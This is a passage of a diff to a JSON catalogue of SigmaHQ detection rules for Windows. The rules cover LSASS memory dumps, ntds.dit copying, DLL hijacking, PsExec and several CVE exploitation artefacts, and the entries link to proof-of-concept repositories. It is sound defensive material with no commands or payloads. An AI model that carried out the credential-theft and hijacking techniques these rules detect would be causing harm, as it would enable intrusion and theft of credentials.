"net_connection_win_crypto_mining.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ] + }, + "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "value": "Windows Crypto Mining Pool Connections" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate msiexec over networks" + ], + "filename": "net_connection_win_msiexec.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "value": "Msiexec Initiated Connection" + }, + { + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_ntds_dit.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" + "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", + "https://adsecurity.org/?p=2398", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ] }, - "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "value": "Suspicious Binary Writes Via AnyDesk" + "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", + "value": "Suspicious Process Writes Ntds.dit" + }, + { + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Subhash P (@pbssubhash)", + "creation_date": "2022/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/binderlabs/DirCreate2System", + "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "07a99744-56ac-40d2-97b7-2095967b0e03", + "value": "Potential Privilege Escalation Attempt Via .Exe.Local Technique" + }, + { + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "meta": { + "author": "Nasreddine Bencherchali, frack113", + "creation_date": "2022/11/07", + "falsepositive": [ + "Users creating a shortcut on e.g. desktop" + ], + "filename": "file_event_win_susp_lnk_double_extension.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ] + }, + "uuid": "3215aa19-f060-4332-86d5-5602511f3ca8", + "value": "Suspicious LNK Double Extension Files" + }, + { + "description": "Ransomware create txt file in the user Desktop", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_desktop_txt.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "value": "Suspicious Creation TXT File in User Desktop" + }, + { + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_hktl_nppspy.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", + "https://twitter.com/0gtweet/status/1465282548494487554", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "value": "NPPSpy Hacktool Usage" + }, + { + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "meta": { + "author": "frack113", + "creation_date": "2022/06/08", + "falsepositive": [ + "Legitimate microsoft diagcab" + ], + "filename": "file_event_win_susp_diagcab.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threadreaderapp.com/thread/1533879688141086720.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" + ], + "tags": [ + "attack.resource_development" + ] + }, + "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a", + "value": "Creation of a Diagcab" }, { "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", @@ -22175,284 +24246,81 @@ "value": "Unidentified Attacker November 2018 - File" }, { - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", "meta": { - "author": "C.J. May", - "creation_date": "2022/08/09", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", "falsepositive": [ - "Unknown" + "Legitimate use of the profile by developers or administrators" ], - "filename": "file_event_win_bloodhound_collection.yml", + "filename": "file_event_win_susp_vscode_powershell_profile.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" ], "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ] }, - "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "value": "BloodHound Collection Files" + "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", + "value": "VsCode Powershell Profile Modification" }, { - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + ], + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ] + }, + "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", + "value": "Suspicious PROCEXP152.sys File Created In TMP" + }, + { + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", "meta": { "author": "Florian Roth", - "creation_date": "2022/03/12", + "creation_date": "2021/11/15", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_crackmapexec_patterns.yml", + "filename": "file_event_win_lsass_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml" + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://github.com/helpsystems/nanodump", + "https://www.google.com/search?q=procdump+lsass", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" ], "tags": [ "attack.credential_access", "attack.t1003.001" ] }, - "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "value": "CrackMapExec File Creation Patterns" - }, - { - "description": "Detects the creation of system dlls that are not present on the system. Usualy to achieve dll hijacking", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/01", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_create_non_existent_dlls.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", - "value": "Creation Of Non-Existent DLLs In System Folders" - }, - { - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_creation_new_shim_database.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ] - }, - "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "value": "New Shim Database Created in the Default Directory" - }, - { - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_creation_scr_binary_file.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.002" - ] - }, - "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", - "value": "Suspicious Screensaver Binary File Creation" - }, - { - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "meta": { - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", - "creation_date": "2020/05/26", - "falsepositive": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" - ], - "filename": "file_event_win_creation_system_file.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", - "value": "Files With System Process Name In Unsuspected Locations" - }, - { - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_creation_unquoted_service_path.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ] - }, - "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", - "value": "Creation Exe for Service with Unquoted Path" - }, - { - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/11/01", - "falsepositive": [ - "Legitimate Administrator using tool for password recovery" - ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ] - }, - "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "value": "Cred Dump Tools Dropped Files" - }, - { - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "meta": { - "author": "Tim Shelton", - "creation_date": "2022/01/10", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_cscript_wscript_dropper.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" - ], - "tags": "No established tags" - }, - "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "value": "WScript or CScript Dropper - File" - }, - { - "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/09", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_csharp_compile_artefact.yml", - "level": "low", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ] - }, - "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", - "value": "Dynamic C Sharp Compile Artefact" - }, - { - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/afwu/PrintNightmare", - "https://github.com/cube0x0/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" - ] - }, - "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern" + "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "value": "LSASS Process Memory Dump Files" }, { "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", @@ -22480,108 +24348,200 @@ "value": "CVE-2021-26858 Exchange Exploitation" }, { - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", "meta": { - "author": "Sittikorn S", - "creation_date": "2021/07/16", + "author": "Florian Roth", + "creation_date": "2020/02/04", "falsepositive": [ - "Unlikely" + "Very unlikely" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml", + "filename": "file_event_win_hack_dumpert.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" ], "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.001" ] }, - "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", - "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum" + "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "value": "Dumpert Process Dumper Default File" }, { - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/22", - "falsepositive": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" - ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ] - }, - "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", - "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event" - }, - { - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/06", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", - "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" - ], - "tags": [ - "attack.execution", - "cve.2021.44077" - ] - }, - "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "value": "CVE-2021-44077 POC Default Dropped File" - }, - { - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/13", + "author": "Thomas Patzke", + "creation_date": "2017/06/12", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml", + "filename": "file_event_win_tool_psexec.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", + "value": "PsExec Service File Creation" + }, + { + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml" + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" ], "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.defense_evasion", + "attack.execution" ] }, - "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", - "value": "CVE-2022-24527 Microsoft Connected Cache LPE" + "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "value": "Creation Suspicious File In Uncommon AppData Folder" + }, + { + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "meta": { + "author": "Nasreddine Bencherchali, frack113", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_susp_double_extension.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://twitter.com/malwrhunterteam/status/1235135745611960321", + "https://twitter.com/luc4m/status/1073181154126254080", + "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ] + }, + "uuid": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "value": "Suspicious Double Extension Files" + }, + { + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "meta": { + "author": "elhoim", + "creation_date": "2022/04/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_susp_default_gpo_dir_write.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" + ], + "tags": [ + "attack.t1036.005", + "attack.defense_evasion" + ] + }, + "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", + "value": "Suspicious Files in Default GPO Folder" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_creation_unquoted_service_path.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "value": "Creation Exe for Service with Unquoted Path" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_gotoopener_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "value": "GoToAssist Temporary Installation Artefact" + }, + { + "description": "Detects a Windows executable that writes files to suspicious folders", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/20", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_shell_write_susp_directory.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" + ], + "tags": "No established tags" + }, + "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "value": "Windows Shell File Write to Suspicious Folder" }, { "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", @@ -22609,415 +24569,6 @@ "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96", "value": "Powerup Write Hijack DLL" }, - { - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_dll_sideloading_space_path.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cyb3rops/status/1552932770464292864", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", - "value": "DLL Search Order Hijackig Via Additional Space in Path" - }, - { - "description": "Detects creation of a file named 